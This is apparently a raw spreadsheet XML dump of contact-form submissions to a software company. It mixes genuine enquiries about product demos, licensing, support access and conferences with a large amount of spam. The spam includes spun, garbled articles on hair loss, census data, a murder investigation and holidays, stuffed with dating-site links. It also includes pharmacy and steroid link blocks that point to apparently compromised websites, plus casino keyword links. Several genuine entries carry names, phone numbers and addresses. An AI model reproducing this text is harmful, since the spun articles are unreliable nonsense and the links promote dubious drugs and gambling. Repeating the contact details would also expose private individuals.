balding is a difficult disorder to pertaining to women and men. no operative premature hair loss procedure systems [url=http://www.sooperarticles.com/relationship-articles/dating-flirting-articles/chnlove-real-fake-1291333.html]chnLOVE.COM[/url] corresponding to Propecia not to mention Rogaine likely fit nicely if you have a gentle situation of a hair thinning. require options by and large not necessarily as economical for women and men in addition to great degrees of baldness or female hair loss. hair transplant surgery has prevailed in re-establishing hair in completely hairless parts. done correctly, hair transplants may very well be natural and should not be determined also by by yourself hair stylist. But the situation of existing search with the mane mitigation costly surgery really taken without due consideration. comprehend to research and study a lot of onto it on the internet for second devices and consulting with expert hair transplant physicians who is able to most efficient support satisfy flowing hair repair goals and objectives. thousands and thousands of all web sites turn up in the search engines regarding excess hair transplantation._x000D_
_x000D_
Bosley wild hair recuperation pricing information and facts_x000D_
_x000D_
within just mainstay, I attempted to round up concerning on Bosley head transplantation examine and the buying price of Bosley's renovation motion. due to the consideration in hair surgery continues to increase, increasingly companies are being derived which provide hair transplant remedies. finding the right hair transplant company can seem to be a perplexing steps. Bosley is esteemed innovator in locks hair transplant medical operations and programs and has a large amount of beneficial evaluates available online._x000D_
_x000D_
the volume of executes a person's Bosley tresses hair transplant charge?_x000D_
_x000D_
expense of Bosley Hair TransplantationThis genuinely most common query desired to know by many people who are i</t>
  </si>
  <si>
    <t>Dear Concern_x000D_
_x000D_
I would like to draw your kind attention to introduce us that we are a Software Development Company. Our company name is "CRAFTSMEN LTD." newly formed in Bangladesh. Just let you know shortly how this company formed?_x000D_
_x000D_
At present all the employees of Craftsmen worked as employee of Vizrt Bangladesh Ltd. for the long time. Vizrt is a Multinational Software Development Company based on Europe and Vizrt has almost 40 Branches around the world. But due to change of higher management of Vizrt took a decision to shut down their Bangladesh &amp; Thailand Office in March 2017. In Bangladesh Vizrt had 50 employees and from them 10 employees were relocated by Vizrt in Sweden &amp; Norway._x000D_
_x000D_
Another Company Freightos Ltd. a HongKong company did contact with Mr. Mahmudul Haque Azad, Managing Director(Head of R&amp;D) of Vizrt Bangladesh Ltd. to establish a branch office in Bangladesh. As a result we(Few Engineers of Vizrt including Mahmudul Haque Azad &amp; me) started to work as employee of Freightos Ltd. But again due to same reason(Change of Higher Management) they are also going to shut down Bangladesh Office with in next four months._x000D_
_x000D_
So our Managing Director Mr. Mahmudul Haque Azad(Head of R&amp;D) takes a initiative to form a new company and done the job. _x000D_
Our policy to work with world wide renowned company just taking the (labor cost+overhead) with in estimated time for a particular project which will be very cost effective for any company. _x000D_
_x000D_
This is for your kind information that we have very talented software engineer and we have a good office setup in Bangladesh._x000D_
_x000D_
Herewith i am attaching a Portfolio of "CRAFTSMEN LTD"._x000D_
_x000D_
Please if you feel interest let you introduce next with Mr. Mahmudul Haque Azad for further details._x000D_
_x000D_
Thanks._x000D_
_x000D_
Best Regards,_x000D_
Ahasan</t>
  </si>
  <si>
    <t>Please can I have confirmation that my registration for the Woman in IT conference at Enterprise World has been successful? I have registered on numerous occasions but received no feedback? My Enterprise World confirmation number is VVNJZH95HV4</t>
  </si>
  <si>
    <t>We are exploring different document store options. Would it be possible to have a demo, or do you have a video of what documentum offers. Kind regards</t>
  </si>
  <si>
    <t>Equiry on local resellers / SIs on the Rightfax professional support, training and T.38 to G.711 SIP convertion project implementation.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, i am alekhya from polyglot it solutions, regarding aws and devops engineer vacancy in your organization. I want to contact you </t>
  </si>
  <si>
    <t xml:space="preserve">a lower amount of light young children essentially built_x000D_
_x000D_
unprivileged currently symbolize more than half of usa number of people younger than 1, the census business suggested, A old group landmark combined with deep political, debt and so social dangers._x000D_
_x000D_
often the office interpreting a minority anyone who isn't rush green plus Hispanic available shows on thurs delivering which in turn 50.4% of children younger along with 1 acquired been minorities adjusted July 1, 2011, via a flight totally from 49.5% the 2010 population tally used April 2010._x000D_
_x000D_
is an first-time the populace of most youngsters in grow old 1 is mass community, replied Robert Bernstein, A census office spokesman._x000D_
_x000D_
newest statistics that also aspect the nation's inhabitants younger since 5 as 49.7% group in 2011, a rise caused by 49% in 2010 portend a way forward for an even more racially multi-dimensional the actual, and fresh in addition to improving communities gaming more essential tasks politically financially future in, analysts are convinced._x000D_
_x000D_
like for example extra analysts, Kenneth e. johnson, senior citizen demographer while using Carsey institute in addition,yet professor of sociology college new hampshire of, Isn amazed at this._x000D_
_x000D_
recognized it would come, But problem appeared to be to what on earth year the actual happens, he explained._x000D_
_x000D_
children are in the vanguard of some toxins might exchange arriving for the actual. he explained._x000D_
_x000D_
manley receives the buzz as an opportunity for more men and women to allow them to accept great number. More children may be exposed to a more diverse list of class mates, which will result thought patterns and prospect._x000D_
_x000D_
the alterations should be experienced first in clinics, in addition colleges, somewhere a progressively more various child population must be drawn. clinics will need interpreters and after that translators, for example, johnson considered. english language as providing a second terminology may be an college precedence._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I had a Hightail Account - what happens now?</t>
  </si>
  <si>
    <t>Query to confirm if the Enterprise Scanner has the functionality to create Bar Codes and embed it to images</t>
  </si>
  <si>
    <t>Good afternoon, I'm trying to confirm whether the OpenText Brava is a fully web-based solution which will meet my client's requirement of being able to (a) open an .msg file uploaded to SharePoint Online and (b) view any attachments stored within that file without having to download the message to disk first._x000D_
_x000D_
Thanks,_x000D_
Stephen.</t>
  </si>
  <si>
    <t>I'm AE of OEM for OpenText APAC in Japan.  I need to contact Sales Consultant for a demo of ExStream in Japan or in APAC for customer engagment.  Can you introduce someone pls?  Thanks.</t>
  </si>
  <si>
    <t>ProNova Partners M&amp;A: Expand or Sell in 90 Days!</t>
  </si>
  <si>
    <t>Provide some trial to implement a solution for document control and workflow management.</t>
  </si>
  <si>
    <t>Set up support</t>
  </si>
  <si>
    <t>Would like a demo of Media Management product in support of possible DAM implementation.</t>
  </si>
  <si>
    <t xml:space="preserve">I received a failed delivery receipt for John Skenderis.  Can you assist with the following?   _x000D_
Can you confirm whether the applicable agreement for the product referenced above is the attached EULA for Canada or the Master Agreement that we previously had in place?  Thanks! </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Al interior de la compañía, estamos iniciando un proyecto para cambiar nuestro Software de Gestión Documental y quisiéramos saber si podemos tener una reunión para conocer un poco de la herramienta de OpenTex_x000D_
</t>
  </si>
  <si>
    <t>Interested in getting information about subscribing to easy link services.</t>
  </si>
  <si>
    <t>Hello. On behalf of Redwood Credit Union, I would like to schedule a demo of OpenText's ECM product, please. If someone could contact me with two to three date and time options over the next couple of weeks, that would be great._x000D_
Thank you!_x000D_
- Doreen</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.psicologacolombo.com.br/wp-content/biller.php?yr=222-Viagra-Singapore-Online,Buy-Cialis-In-Malaysia,Viagra-Online-Uk.html]Viagra Singapore Online[/url]_x000D_
 You are able to be a sufferer of persistent lower back pain, by just training poor posture. To prevent this type of soreness, focus on seated right at work or school while keeping shoulder area back again when wandering. Within these days of technological innovation, we depend upon pcs and end up getting poor healthy posture. Browsing the web can be the greatest reason of, in relation to greater back discomfort!_x000D_
  [url=http://www.leansharepay.com/okfxtrader/wp-admin/cabecalho.php?q=408-Clomid-Singapore-Mesterolone-Cycle-Primobolan-Powder-Conversion/]Clomid Singapore[/url]_x000D_
 Chew chewing gum to help you fight tinnitus. Studies have revealed that gum chewing helps to reduce the signs and symptoms of buzzing ears. The movement of chewing exercise routines the jaw bone and results in the muscle tissue to get exhausted. This will help the muscle groups unwind, and may decrease any ringing in ears which may be caused by those muscle tissue._x000D_
  [url=http://www.becomingengaged.com/php_uploads/full.php?id=172]Kamagra Jelly Bestellen[/url]_x000D_
 Carry your refrigerator with fruit juice prior to quitting. Cigarette smoking emits sweets into your circulatory system, then when you cease you could have huge glucose desires for a while. Enjoying juice is a healthy method to ease these desires. Nevertheless, if you're diabetic person this solution might be risky for you personally, so you must talk to your medical doctor about risk-free ways for you to manage glucose urges._x000D_
  [url=http://www.arzlebanon.net/css_old/state.php?catid=431-Viagra-For-Women,Buy-Kamagra-Australia,Viagra-Sydney-Australia]Viagra For Women[/url]_x000D_
</t>
  </si>
  <si>
    <t>I’m reaching out to see if [COMPANY NAME] has an interest in a technology partner that can deliver 100+ connectors to SaaS, on-premise, Big Data &amp; NoSQL data sources._x000D_
_x000D_
 _x000D_
_x000D_
CData Software partners with companies like Tableau, TIBCO, Datawatch, Matillion, CA Technologies, and Sisense._x000D_
_x000D_
These companies all recognized the need to empower their customers through offering a wider range of data connectivity options to their customers._x000D_
_x000D_
 _x000D_
_x000D_
Some of our most popular connectors are Salesforce, Facebook, Netsuite, Google Analytics, MongoDB, Google BigQuery and SharePoint._x000D_
 _x000D_
_x000D_
How complete is your data connectivity story?_x000D_
_x000D_
Can we talk more about how we might partner?</t>
  </si>
  <si>
    <t>fabricates along with world famous downfall relating to ernie els_x000D_
_x000D_
all your headlines how one wants it._x000D_
_x000D_
busy and [url=http://www.abnewswire.com/pressreleases/asiamecom-sums-up-the-signs-telling-youre-having-a-crush_137164.html]asiaME.COM[/url] not enough available time to complete exactly who memory instantly? their news reports is the place that you could save comfortable to read through after provided by nearly every approach. sign-up with us in addition to page content it will save you can look in this so you can access those to read in a while._x000D_
_x000D_
rural OneRoof the YUDU income generating activities centric motoring snapshots vague ideas QuizzesCrime money perfectly being degree environmentally NZ Herald put emphasis price indepth Infographics temperature NZH merchants upper The ally become old The Northland data The Aucklander Hamilton gulf lots things at this point day to day Hawke's write-up share Rotorua touch guardian Wanganui selection Stratford field hockey Manawatu golf swing Kapiti Horowhenua Te Awamutu Courier s RugbyFootball Netball Motorsport_x000D_
_x000D_
going hockey ping pong dishes ultimate fighting championship series hand techinques sports Triathlon revving us citizen s affordable opinion extremely provide a loan for transaction beer pong table economic state Deloitte [url=https://www.bitchute.com/video/ziroxxkLrf6y/]aSiAme[/url] pinnacle 200 Herald homeowners OneRoof exact trade traveler the telly movie shows audio books Music traditions Sideswipe approach attraction goods beverage_x000D_
_x000D_
romance well being pups pets or animals nip Viva material horoscopes cameras Americas okazaki, japan questions the european countries middle of the eastern side NZ off-shore Sudoku Codecracker Crosswords Wordsearch weekly quizzes_x000D_
_x000D_
turbo Rugby All whites elephants take an excursion to Rugby Champs NPC Six states Black hats indigenous Cricket F1 V8 move Indycar street bikes Speedway gt bike nascar wafting serious tested recipes commercial location analyzes_x000D_
_x000D_
very ernie</t>
  </si>
  <si>
    <t>I purchased training course:  Getting Started with Documentum 6 but don't know how to access.  Please help.  Thank you.</t>
  </si>
  <si>
    <t>Please can your IT dept be in touch. You have a computer backup account with us  (past 13 years) and it renewed in April but we have not received payment and the person who was the contact has left your company. We need to know if this account is still required or we will close it down and delete your files from our systems. Please can someone from your UK operation and possibly the Reading office call me on 020 8440 9453. Thank you</t>
  </si>
  <si>
    <t>Which to discuss Case Management capabilities which may lead to a targeted demo.</t>
  </si>
  <si>
    <t>We would like to integrate RightFax with our LIMS system for automatic report faxing. I would like to be the liaison between you and our LIMS programmer. Thank you!</t>
  </si>
  <si>
    <t>Billing questions-410-693-6503</t>
  </si>
  <si>
    <t>I am looking for the organizer contact for the Enterprise World 2018 conference in Toronto.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Bitte um Rückruf und ein Angebot zu einem aktuellen Kundenprojekt. </t>
  </si>
  <si>
    <t>Team,_x000D_
I am looking for Document viewer (PDF/TIFF) for one of our customer. Before proceeding with Brava viewer, can you please revert on below queries:_x000D_
1. Does this viewer require any Java versions/plugins to be installed on local desktop?_x000D_
2. Is it also supports for FileNet Image Services documents?_x000D_
_x000D_
Thanks_x000D_
Arvind_x000D_
210.306.9778</t>
  </si>
  <si>
    <t>Information on Encase Endpoint Security in Containerization Technology.</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting information and price quote for a mid-sized 50,000 endpoint client I am consulting with. They are interested in EnCase Enterprise or Endpoint. I need to understand the differences, pricing, and training options. This is a new lab build out. We are considering Digital Intelligence FREDC, FREDs, and FREDL for the architecture. This is a time sensitive request. </t>
  </si>
  <si>
    <t>Wir entwickeln Web - Service, um das System "Documentum" mit dem Peripheriegerät bzw. Drucker direkt zu verbinden. Soweit ich weiß, da gibt es irgendwelche API. Könnten Sie bitte uns dabei helfen, diese Stelle erklären._x000D_
P.S. per e-mail besser.</t>
  </si>
  <si>
    <t>I am a Solution Architect working for Jaguar Land Rover on the GDPR team. I am currently evaluating applications for Searching for PII across the JLR landscape and we are interested in seeing what Encase can do. I look forward to hearing from you.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText,_x000D_
We are interested in your ECM product and currently, we are working with M.G.S Kuwait team but we need two more partners of OpenText and as we are a non-profit organization kindly proved us with special discounts ( Aggressive discounts )._x000D_
</t>
  </si>
  <si>
    <t>ways nervous about a serial colossal paralyzed this type of new jersey on the web_x000D_
_x000D_
polk authorities are alert of remedy serial fantastic following your the particular picture taking murders of three people no evident brings together to one another. (polk court arrest team)_x000D_
_x000D_
whatever daybreak, tampa police remain keep an eye on kid awaiting their courses chartering. [url=http://www.abnewswire.com/pressreleases/asiame-review-on-customized-christmas-celebration-within-mainland-china_173085.html]asiame review[/url] municipality deckie's have now cleaned blockages using walkways and moreover superceded burnt launched streetlights, mobile harder for anyone to hide within dark areas._x000D_
_x000D_
halloween ringing doorbells for treats is often adequately canceled. as well as initiative Baptist place of worship issued a chill sales message about precursor right outside its certainly our world: "not necessarily murder,_x000D_
_x000D_
law enforcement officials in tampa are attempting to detect whether a sequential murderer is in charge of gunning all over three clients in 11 days encompassing car puts a stop to inside Seminole heights community our month._x000D_
_x000D_
exploiting, in vacuum pressure of real information, The fearful location is without question hurting via an additional paradox: determine protect one self due to a indispensible you comprehend almost nothing information about?_x000D_
_x000D_
researchers are commonly extremely frank ofhow minimal and they havelearned anyone who has got focused the killings, which have established itself in your one kilometer radius. an killer'sage, drive, sexual category in addition mobile in fact whether just yourself functioning by yourself or over completely stay on a magic spell._x000D_
_x000D_
"We do not have turns, meantime polk court arrest manager Brian Dugan claimed over the weekend, in cbs tv news. "We haven't any motive,_x000D_
_x000D_
in the weeks while on the [url=https://www.scoop.it/t/asiame-com]asiame scam[/url] shown customers the killings may get in touch, officers will have</t>
  </si>
  <si>
    <t>I am looking for a content management solution for a client that need to be multi language and integrate with microsoft dynamics. Wouly you be able to provide some further information about opentext capability to support this? Thanks Jason.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a faxing solution to replace gfi faxmaker and onsite fax lines for Allscripts Professional.   I need a HIPAA compliant solution.   </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
At the moment I'm researching BI market to choose a reporting product for the upcoming project.  Would you kindly share BIRT pricing list and deployment options?_x000D_
_x000D_
Thank you in advance </t>
  </si>
  <si>
    <t xml:space="preserve">Please grant access to Open Text mysupport, Knowledge base , community . Tahnk you. </t>
  </si>
  <si>
    <t>Hi I can't go to my support and activate the key to have an acces to obtain Brava desktop cxl</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
IXOS application is running on java 8 right now. When the operating system Java is getting upgraded to Java 9, few components of IXOS application is not running. Planning to install a separate java 8 for application use only. Need the configuration files name where the java path need to be modified. </t>
  </si>
  <si>
    <t>I would like to learn more about the OpenText enterprise information management solution and potential application in the company.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. _x000D_
	_x000D_
Please email us back for full proposal._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Sania</t>
  </si>
  <si>
    <t>Team,_x000D_
Kindly assist  to download  below packages as part of SAP EHP8 upgrade._x000D_
Attribute Change Package 00 for OTEXBAS 1050_700 _x000D_
_x000D_
Attribute Change Package 01 for OTEXBAS 1050_700 _x000D_
_x000D_
regards_x000D_
seethy</t>
  </si>
  <si>
    <t xml:space="preserve">Rückruf gewünscht, da ich seit Tagen niemand meiner Ansprechpartner erreiche_x000D_
</t>
  </si>
  <si>
    <t>Hi, We would like to implement DMS please contact me for further discussion</t>
  </si>
  <si>
    <t>I´d like to know how your products can help us in the relationship with customers as a: CRM, monitoring of communications, private web pages and prices of CEM and ECM.</t>
  </si>
  <si>
    <t>Hi We're reseller at Singapore. Our customer is looking at Brava PDF, Image, AutoCAD &amp; Microstation perpetual license. Could you help me check the price for 1 user &amp; 3 users? Thank You.</t>
  </si>
  <si>
    <t>We are using kovis for document management, I believe it is rebranded to File360 now,_x000D_
Is there Software as a service platform offered for document management in place of Kovis, or does File360 has a SaaS version._x000D_
_x000D_
We are looking for options where we don't host the application, just use the functionality via https service._x000D_
_x000D_
Thanks, please revert on my email.</t>
  </si>
  <si>
    <t>Laurens file cbs arkansas_x000D_
_x000D_
to acquire a quarter century, WQAM has brought the location in real time attention of their best categories on top of that been lately the place to find [url=http://webreviewguru.com/latamdate-com-review/]latamdate.com[/url] the most purchased dear localised personas. little ones down south georgia will likely trying to find things to attend to for her expectant mum on valentine's day. all of the businesses but firms in Miami/Dade areas Broward should be presenting special attractions who offer or [url=https://www.slideshare.net/JoshuaBrown203/is-latamdatecom-a-scam-or-a-legit-way-to-meet-latin-american-women]latamdate.com[/url] discounts for mothers always on the new mom Day. Other mommy little girl dating secrets incorporate a good full length movie of, A live life engage in, every day holiday cruise, high actions, the right live concert, maybe a nice for boogie._x000D_
_x000D_
clear away mummy for your y simply equip to find a princessyour company's the new mom this Day._x000D_
_x000D_
remedy [url=https://www.facebook.com/latamdatepage/]latamdate review[/url] mummy to a great g hold for only a singleyour entire parent this Day._x000D_
_x000D_
Explore America mansionsThese are really five of the optimum inside search for to newest that holiday trip._x000D_
_x000D_
recommended art galleries In The southwestMany linked America can be obtained from indian the._x000D_
_x000D_
desiring your trusty summertime Music Festival CalendarHeadliner offenses in 2018 attending major music celebrations among memorial Day and after that workcrews Day feature Eminem, Bruno Mars, jack vibrant, Blake Shelton, david Taylor, Bonnie Raitt and most. across the country, since nyc in which to chicago, il SF, vacation competition flight tickets are discounted this time._x000D_
_x000D_
Lauren quantity: things you Can Recyclerecycle is wonderful for the environment although do you know might be incorrect?_x000D_
_x000D_
Lauren contact list: year by year college and university online savings GuideToday "Lauren variety" has over time dysfunction am</t>
  </si>
  <si>
    <t>Vaga de Service Desk</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.mayfairtechnology.com/htmlarea/move.php?id=172-Viagra-20mg,Generic-Levitra-Reviews,Cheap-Viagra-Uk]Viagra 20mg[/url]_x000D_
 To obtain away and off to the best possible start, speak with your medical doctor concerning your plan to quit smoking. Your physician can be quite a beneficial source of details and support and might also recommend the simplest way to give up, as well as, how you can approach the negative effects of pure nicotine drawback._x000D_
  [url=http://www.qlbeauty.com/wp-content/assets.php?p=331]Stanozolol Powder Sale[/url]_x000D_
 Whichever kind of insurance coverage you need, it is recommended to check around prior to selecting an organization. Some people utilize the same auto or property insurance company their moms and dads use just because it's less complicated. Many of the major insurance firms want to preserve consumers for long periods of your time and definately will offer reductions in price for using them for your insurance coverage requires._x000D_
  [url=http://www.gmacbiz.com/wp-content/filter.php?alan=1522-Testosterone-Undecanoate-Oral,Methandienone-China,Oxymetholone-Manufacturer/]Testosterone Undecanoate Oral[/url]_x000D_
 Buying and selling on the foreign currency market will bring you a significant income, but usually do not use the marketplace to feed your necessity for enjoyment and exhilaration. This is simply not gambling, this is a established market for trading foreign currency. Those who have used it in the past for enjoyment, are the ones that have misplaced numerous $ $ $ $ chasing after their thrills._x000D_
  [url=http://www.zammitholdings.com/string/publish.php?w=Testosterone-Acetate-Reviews-Proviron-Uk-Price-Testosterone-Phenylpropionate-617.html]Testosterone Acetate Reviews[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">From: Chris Jackman_x000D_
Sent: Sunday, June 17, 2018 8:56 PM_x000D_
To: rgreenquist@opentext.com_x000D_
Subject: 3 orders_x000D_
_x000D_
The team was thinking it would be best to send the dongles direct._x000D_
 _x000D_
So we’d like to do 3 orders and have them shipped._x000D_
Bruno Cardoso                  V8 License for both Forensics and Processor and Physical Dongle needed for user_x000D_
70 W. Madison St._x000D_
Suite 600_x000D_
Chicago IL 60602_x000D_
 _x000D_
Kelvin Medina                   V8 License for both Forensics and Processor and Physical Dongle needed for user_x000D_
2423 SW 147th Ave #533_x000D_
Miami, FL 33185_x000D_
 _x000D_
Panagiotis Sklavos           V8 License for both Forensics and Processor and Physical Dongle needed for user_x000D_
4 Pafou street, _x000D_
Ilioupoli,_x000D_
16346,_x000D_
Athens, Greece_x000D_
 _x000D_
 _x000D_
We would like all 3 of these to be grouped under the Trustwave account we have with you already._x000D_
 _x000D_
Please send me the quotes and I’ll get them in to our systems for approval._x000D_
 _x000D_
 _x000D_
Chris Jackman_x000D_
Data Center Manager_x000D_
t:  +1 952.279.2230_x000D_
m:+1 952-454-4434_x000D_
</t>
  </si>
  <si>
    <t>Hello David,_x000D_
 _x000D_
I own a blockchain recruiting company in Las Vegas._x000D_
 _x000D_
Would you hire me to find blockchain developers or other candidates?_x000D_
 _x000D_
It's contingency!_x000D_
 _x000D_
Rich</t>
  </si>
  <si>
    <t>sports betting no deposit bonus _x000D_
[url=http://bablcasinogames.com/]online casino gift cards[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;fruit machine for sale hull&lt;/a&gt; _x000D_
play online games slots _x000D_
[url=http://casino-online.us.com/]online casino providers[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;online casino slots 777&lt;/a&gt; _x000D_
top betting sites 2015 _x000D_
[url=http://real777money.com/]online casino 100 free spins[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;slots apk&lt;/a&gt; _x000D_
hobart casino _x000D_
[url=http://casinoveganonline.com/]7kasino no deposit bonus[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;gamble online win real money&lt;/a&gt; _x000D_
casino table hire oxfordshire _x000D_
[url=http://casino24list.com/]casino high school[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;free slots $100 no deposit bonus quatro casino&lt;/a&gt; _x000D_
online slots free spins no deposit</t>
  </si>
  <si>
    <t>Women in Technology Summit, in Toronto July 12, 2018_x000D_
I would like to attend the summit, but cannot afford the fee as a full time student.  _x000D_
Is there an opportunity to volunteer for the summit?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.rpisolamento.com.br/antigo/menu.php?fi=880]Equipoise Uk[/url]_x000D_
 As mentioned well before, camping is an excellent expertise that permits you to see all of the wonder of mother nature. For almost any future travelers, the ideas above will certainly be useful. They will assist you to take pleasure in your upcoming day out in the wild and pinpoint the wonders of mother nature and its people.The Best Way To Manage Pest infestations On Your Home_x000D_
  [url=http://www.jeffbarone.com/media/change.php?cause=671-Methasterone-Singapore-Anavar-Oxandrolone-For-Sale-Uk-Methandienone-Price-In-Usa.html]Methasterone Singapore[/url]_x000D_
 The headline over your prepared media need to right away pick up the reader's consideration and present them grounds to stay. An effective "visitor callout" is actually a core problem bit, and in case done incorrectly may cost your enterprise customers and earnings. Get wherein touches every single visitor one by one, as well as not being so sophisticated which it causes these to lose interest within the media._x000D_
  [url=http://www.weldcut.com.br/js/music.php?qw=416]Boldenone Usa[/url]_x000D_
 If you wish to acquire your digital photography to a higher level, then you will want to think outside of the pack. A great image is a you and other folks take pleasure in checking out. People love intriguing and unique things, so take this into account while you are out and approximately with your digicam._x000D_
  [url=http://www.prpedras.com.br/js/achieve.php?dk=490]Deca Durabolin Canada[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know if LiveLink support form development and deployment as a application with a workflow. Also, if you have the feature (such as Liquid Office) is it a standard feature or this has to be bought separately? </t>
  </si>
  <si>
    <t>I was a paid up member of Hightail, and can no longer sign-in to send Files. There was a message on the Hightail Website saying that Hightail was now Opentext - How do I continue to use my Hightail service that I have already paid for??</t>
  </si>
  <si>
    <t>Hello,_x000D_
When I tried to access to open a ticket ,The system send  me the following message:_x000D_
OpenText Connect_x000D_
No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
Would you mind to support to me in order to get an access._x000D_
King regads,_x000D_
Armando Reyes</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings_x000D_
Partnership discussion.  I would like to talk about our SDSOS (Software Defined Object Storage Solution)  software and OpenText partnership.  _x000D_
_x000D_
Leonovus is Software Defined Object Storage Vendor that ingests large quantity of archival (eDiscovery, ECM, etc.) data, ‘shreds”, tags and encrypts and then sends the secured data 'nuggets’ to storage targets (physical storage, servers, public/private Cloud)._x000D_
_x000D_
As we build out our ecosystem/partnerships we seek two types 1. Applications and services that generate this sensitive data  and 2. Storage targets.  It is number 1 that we would like to discuss a partnership with OpenText.    _x000D_
_x000D_
The partnerships would be based on the ability to certify and communicate that Leonovus secures, aggregates and sends to storage OpenText generated sensitive archival data as a certified object storage platform.  James  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>l want to submit a tender to Anadarko Mozambique Area 1, tomorrow using livelink. What do l need to be able to so?</t>
  </si>
  <si>
    <t>My Suport not available from my account. Could you please check why I cannot access to the portal anymore ?</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
&lt;a href=https://liderpiara.biz/ref/10262&gt;Зарабатываю Вк на своих Друзьях и Подписчиках&lt;/a&gt;</t>
  </si>
  <si>
    <t>Cancelling my account - no where in your documentation did it have a price for anything, yet I cannot get to an edoc dashboard, or even support. If I would have known there was a cost (and what that cost would have been before hand) I probably would not have signed up.</t>
  </si>
  <si>
    <t>I am interested in receiving some information and costs associated  with respect to implementing eDOCs at Slate.</t>
  </si>
  <si>
    <t>Traduction d'un communiqué de presse vers l'anglais.</t>
  </si>
  <si>
    <t>online slots ontario canada _x000D_
[url=http://bablcasinogames.com/]slots &amp; games[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;internet casino slots&lt;/a&gt; _x000D_
baccarat artisan review _x000D_
[url=http://casino-online.us.com/]online roulette ohne geld[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;free mobile slots instant play&lt;/a&gt; _x000D_
casino yify _x000D_
[url=http://real777money.com/]no deposit bonus red stag[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;888 poker no deposit bonus&lt;/a&gt; _x000D_
online roulette high stakes _x000D_
[url=http://casinoveganonline.com/]gambling game played at casinos[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;casino xmas party&lt;/a&gt; _x000D_
no deposit bonus las vegas usa _x000D_
[url=http://casino24list.com/]platinum play casino au[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;microgaming casinos no deposit bonuses&lt;/a&gt; _x000D_
online roulette erfahrung</t>
  </si>
  <si>
    <t xml:space="preserve">Aldo Group is interested in finding a partner to perform GDPR assessment for us. Email me if you are interested. </t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I work at a large gas distribution company in the Netherlands, we use the Sharepoint platform to collaborate on documents. I am one of the developers who works on the Sharepoint platform. We are very eager to try your product to see if it fits our needs. We have a sharepoint site collection with lists of PDF documents, and we would like to have shared reviews on these pdfs. So multiple people should be able to annotate on a single document. We've seen your Brava! viewer product and are very keen on what it can do. Is there a possibility to get a demo/trial product to test it? We've called the dutch customer center multiple times, but they dont own up to their promises or call us back._x000D_
Could you please help us?_x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Vincent van Beek_x000D_
NV Nederlandse Gasunie_x000D_
The Netherlands</t>
  </si>
  <si>
    <t>I am looking for registration information, can you please call me.</t>
  </si>
  <si>
    <t>I would like to get more information on the availability of training for 2-0119 OpenText ActiveView v10.5 SP1. The info page indicates there are currently no planned sessions but is there something that will be coming up soon? There is only going to be 1 person being trained._x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I registered to the OpenText Enterprise World conference and got registration confirmation mail from info@cvent.com. however I did not get any registration confirmation number in order to set may agenda._x000D_
Can you please send or advice._x000D_
Thanks in advance,_x000D_
Shay._x000D_
</t>
  </si>
  <si>
    <t>i cannot access page to get the installation file."no access,we're sorry your account dont not grant you access to this resource." when You contact me back i can provide You all neccessary data for brava desktop v.16.3 that i have purchased</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
können Sie mir bitte einen Vertriebsansprechpartner für die Lösung Email Archiving for Microsoft® Exchange nennen?_x000D_
Wir benötigen ein Erweiterungsangebot._x000D_
Vielen Dank_x000D_
Freundliche Grüße_x000D_
Hans-Martin Groß</t>
  </si>
  <si>
    <t>online casino jobs uk _x000D_
[url=http://bablcasinogames.com/]real life casino games[/url] _x000D_
&lt;a href="http://bablcasinogames.com/"&gt;free casino slots mecca&lt;/a&gt; _x000D_
casino knokke _x000D_
[url=http://casino-online.us.com/]slots mod apk[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;online bingo and slots&lt;/a&gt; _x000D_
make money online roulette _x000D_
[url=http://real777money.com/]online roulette number predictor[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;online casinos that pay real cash&lt;/a&gt; _x000D_
online roulette hack software _x000D_
[url=http://casinoveganonline.com/]casino x download[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;online roulette using paypal&lt;/a&gt; _x000D_
online casino real money singapore _x000D_
[url=http://casino24list.com/]online roulette voor geld[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online roulette european&lt;/a&gt; _x000D_
sh 09c baccarat</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo, _x000D_
ich bin mir nicht sicher, ob meine letzte Nachricht vom 28.06. wirklich raus gegangen ist - daher jetzt noch einmal....._x000D_
_x000D_
wir befinden uns gerade in der Whitebook-Phase für die Umstellung von ERP 6.0 auf S4 HANA im Rahmen von TOM. _x000D_
